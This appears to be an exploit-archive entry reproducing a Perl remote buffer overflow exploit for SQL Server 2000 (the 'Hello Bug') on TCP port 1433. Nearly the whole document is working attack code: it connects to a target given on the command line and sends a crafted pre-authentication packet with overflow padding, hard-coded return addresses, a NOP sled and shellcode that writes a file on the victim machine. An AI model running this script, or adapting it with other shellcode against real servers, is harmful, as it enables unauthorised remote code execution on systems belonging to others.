SQL Server 2000 remote buffer overflow exploit. Uses tcp port 1433. More information here.
3a6d1455f5516c79193ad22a34830d280df3ae4df2cafbc718ee266e6dbf3dca
#!/usr/local/bin/perl
#-----------------------------------------------------------
# Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
# by sk@scan-associates.net & spoonfork
#
# Bug found by
# Dave Aitel
# http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to: scan clan, especially to tynon, pokleyzz, and wyse
# Alphaque and L33tdawg.
# and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
# http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;
$connect_host = $ARGV[0];
if (!defined($connect_host)) {
print "Usage: $0 <target>\n";
exit 255;
}
$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);
$bug = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .= "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .= "\x10\x00\x00\x00";
$bug2 = "A" x 528;
$bug .= $bug2;
$bug .= "\x6b\xd0\xc0\x40";
$bug .= "AAAA";
$bug .= "\x83\x91\xe8\x77";
$bug .= "\x50\x1e\xd0\x42";
$bug .= "\x0b\x03\x0f\x02";
$bug .= "DDDD";
$bug .= "\x50\x1e\xd0\x42";
$bug .= "\x50\x1e\xd0\x42";
$bug3 = "\x90" x 88;
$bug .= $bug3;
$bug .= "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .= "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .= "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .= "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";
$bug .= "\x00\x24\x01\x00\x00";
print SOCKET $bug;